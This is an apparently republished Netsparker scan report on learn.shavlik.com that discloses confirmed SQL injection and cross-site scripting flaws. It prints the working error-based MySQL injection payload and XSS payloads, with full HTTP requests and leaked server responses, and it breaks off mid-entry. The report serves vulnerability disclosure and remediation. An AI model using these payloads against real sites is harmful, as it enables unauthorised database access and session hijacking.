GHDB, DORK, SQL Injection, Database Error, CWE-89, CAPEC-66, learn.shavlik.com REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Private Reporting of Security Research is preferred for Online Service Providers


Loading

Netsparker - Scan Report Summary
TARGET URL
http://learn.shavlik.com/shavlik/index.cfm?m=...
SCAN DATE
4/25/2011 7:16:17 AM
REPORT DATE
4/25/2011 6:05:14 PM
SCAN DURATION
00:02:56

Total Requests

1054

Average Speed

5.96 req/sec.
13
identified
8
confirmed
2
critical
3
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
15 %
IMPORTANT
31 %
LOW
31 %
INFORMATION
23 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/shavlik/index.cfm m GET SQL Injection Yes
m GET [Probable] SQL Injection No
m GET Cross-site Scripting Yes
h GET Cross-site Scripting Yes
Permanent Cross-site Scripting Yes
Database User Has Admin Privileges Yes
m GET Internal Server Error Yes
Cookie Not Marked As HttpOnly Yes
m GET Database Error Message No
ViewState is not Encrypted No
MySQL Database Identified Yes
E-mail Address Disclosure No
IIS Version Disclosure No
SQL Injection

SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CO..

Parameters

Parameter Type Value
m GET (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
pg GET 697
h GET 0
hp GET 697
utm_term GET vulnerability management
utm_campaign GET PatchManagement
utm_mt GET e
gclid GET CPC_jKTPt6gCFUh-5QodsROzEA

Extracted Data

5.0.51b-community-nt-log

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:16:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>






































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Duplicate entry '_!@4dilemma:1' for key 1
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


















<tr><td>

<table border="0" cellpadding="0" cellspacing="0">



</table>
</td></tr>




<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">25-Apr-11 07:16 AM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /shavlik/index.cfm

/shavlik/index.cfm

http://learn.shavlik.com/shavlik/index.cfm?m=%2527&pg=697&h=0&hp=697&utm_term=vulnerability%20manage..

Parameters

Parameter Type Value
m GET %27
pg GET 697
h GET 0
hp GET 697
utm_term GET vulnerability management
utm_campaign GET PatchManagement
utm_mt GET e
gclid GET CPC_jKTPt6gCFUh-5QodsROzEA

Request

GET /shavlik/index.cfm?m=%2527&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799687; CFTOKEN=56587765
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:16:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>






































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 AND DMMESSAGE.userCompanyID = 21 ORDER BY DMMESSAGE.ID' at line 7
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


















<tr><td>

<table border="0" cellpadding="0" cellspacing="0">



</table>
</td></tr>




<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">25-Apr-11 07:16 AM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







Cross-site Scripting

Cross-site Scripting

2 TOTAL
IMPORTANT
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=%3E%3CiMg%20src=N%20onerror=alert(9)%3E&pg=697&h=0&hp=6..

Parameters

Parameter Type Value
m GET ><iMg src=N onerror=alert(9)>
pg GET 697
h GET 0
hp GET 697
utm_term GET vulnerability management
utm_campaign GET PatchManagement
utm_mt GET e
gclid GET CPC_jKTPt6gCFUh-5QodsROzEA

Request

GET /shavlik/index.cfm?m=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:17:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>






































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><iMg src=N onerror=netsparker(9)> AND DMMESSAGE.userCompanyID = 21 ORDER ' at line 7
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


















<tr><td>

<table border="0" cellpadding="0" cellspacing="0">



</table>
</td></tr>




<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">25-Apr-11 07:17 AM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h='%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
m GET 1112
pg GET 697
